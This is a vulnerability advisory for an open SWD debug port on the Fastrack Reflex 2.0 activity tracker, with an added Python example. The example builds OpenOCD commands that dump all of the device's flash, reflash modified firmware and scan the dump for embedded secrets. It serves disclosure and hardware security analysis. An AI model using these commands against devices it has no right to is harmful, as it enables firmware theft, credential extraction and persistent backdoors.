Open Serial Debug Port Allows Firmware Dumping and Re-flashing in Fastrack Reflex 2.0 Activity Tracker
CVE-ID
CVE-2021-35954
Vendor
Fastrack
Product
Fastrack Reflex 2.0 Activity Tracker
Vulnerability
The Serial Wire Debug (SWD) port is left open, so anyone with physical access can attach a debugger, dump the device's firmware and reflash custom firmware without any authentication.
Vulnerability Description
During hardware analysis of the PCB, the SWD (Serial Wire Debug) interface was found to be exposed and unprotected: no debug lock or flash read-out protection stood in the way of a standard debug probe.
An attacker with physical access can therefore connect a debugger, halt the core and read the entire firmware image out of flash without any authentication, exposing the application logic and any keys or credentials stored in it.
The same interface can be used to erase and write flash, so modified or malicious firmware can be loaded onto the device, either bricking it or planting a persistent backdoor. A production device should ship with the MCU's debug-port lock or flash read-out protection enabled; with that set, a probe can at most mass-erase the part but cannot read the firmware that is on it.
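As an added illustration (not part of the advisory and not vendor code) of what the attack path looks like in practice: the first function builds the OpenOCD command line an analyst would use to pull flash over SWD, the second builds the matching reflash command, and the rest sanity-checks the dump, because a read-out-protected or blank part returns an all-0xFF image rather than an error. The advisory does not name the MCU, so the interface/target config files, the flash and SRAM ranges and the sample image bytes are assumptions for illustration only.

```python
"""Dump-and-check helpers for an open SWD port (added example, not from the
advisory). The MCU on the Reflex 2.0 is not identified in the advisory, so
INTERFACE_CFG, the target .cfg name and the memory map below are ASSUMED;
replace them with the values for the part actually on the PCB."""
import struct

# Assumed memory map for a generic Cortex-M part (hypothetical values).
FLASH_BASE = 0x0000_0000
FLASH_SIZE = 0x0004_0000          # 256 KiB
SRAM_BASE = 0x2000_0000
SRAM_SIZE = 0x0001_0000           # 64 KiB
INTERFACE_CFG = "interface/cmsis-dap.cfg"   # assumed debug probe


def openocd_dump_cmd(out_file: str, target_cfg: str) -> list:
    """argv for OpenOCD: attach over SWD, halt the core, dump all of flash.

    target_cfg is the OpenOCD target script for the MCU (e.g. 'target/xxx.cfg');
    it is a required argument because the advisory does not name the part.
    """
    script = f"init; halt; dump_image {out_file} {hex(FLASH_BASE)} {hex(FLASH_SIZE)}; shutdown"
    return ["openocd", "-f", INTERFACE_CFG, "-c", "transport select swd",
            "-f", target_cfg, "-c", script]


def openocd_flash_cmd(image_file: str, target_cfg: str) -> list:
    """argv for OpenOCD: erase flash and write a (possibly modified) image back."""
    script = (f"init; halt; flash write_image erase {image_file} {hex(FLASH_BASE)}; "
              f"verify_image {image_file} {hex(FLASH_BASE)}; reset; shutdown")
    return ["openocd", "-f", INTERFACE_CFG, "-c", "transport select swd",
            "-f", target_cfg, "-c", script]


def check_cortex_m_dump(image: bytes) -> dict:
    """Decide whether a raw dump looks like real Cortex-M firmware.

    A locked or blank part typically yields all 0xFF (or all 0x00). A genuine
    image starts with the vector table: word 0 is the initial stack pointer
    (inside SRAM) and word 1 the reset handler (inside flash, Thumb bit set).
    """
    reasons = []
    if len(image) < 8:
        return {"looks_valid": False, "reasons": ["image shorter than a vector table"]}
    for fill in (0xFF, 0x00):
        if image.count(fill) / len(image) > 0.99:
            reasons.append(f"image is almost entirely 0x{fill:02X}: blank or read-out protected")
    sp, reset = struct.unpack_from("<II", image, 0)
    if not (SRAM_BASE <= sp <= SRAM_BASE + SRAM_SIZE):
        reasons.append(f"initial SP 0x{sp:08X} is not in SRAM")
    if not (reset & 1):
        reasons.append(f"reset vector 0x{reset:08X} lacks the Thumb bit")
    if not (FLASH_BASE <= (reset & ~1) < FLASH_BASE + len(image)):
        reasons.append(f"reset vector 0x{reset:08X} points outside the dumped image")
    return {"looks_valid": not reasons, "reasons": reasons}


def find_strings(image: bytes, min_len: int = 6) -> list:
    """Printable ASCII runs in the dump; a quick way to spot embedded secrets."""
    found, run = [], bytearray()
    for b in image + b"\x00":            # sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(run.decode("ascii"))
            run = bytearray()
    return found


# Constructed sample dump (not real Reflex 2.0 firmware): a plausible vector
# table, some padding, and a cleartext credential of the kind a dump exposes.
SAMPLE_IMAGE = (struct.pack("<II", SRAM_BASE + SRAM_SIZE, 0x00000195)
                + b"\x00" * 0x1F8
                + b"DEVICE_KEY=ab12cd34\x00"
                + b"\xFF" * 0x200)

if __name__ == "__main__":
    print(" ".join(openocd_dump_cmd("fw.bin", "target/CHANGE_ME.cfg")))
    print(check_cortex_m_dump(SAMPLE_IMAGE))
    print(find_strings(SAMPLE_IMAGE))
```

The check matters because many probes happily "dump" a read-out-protected part and simply return 0xFF for every word; without validating the vector table an analyst can mistake a locked chip for an empty one, or the reverse.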
Disclosure Timeline
17 Nov 2020 — Reported to vendor
30 Jun 2021 — No response; moving forward to public disclosure
Credit
Shakir Zari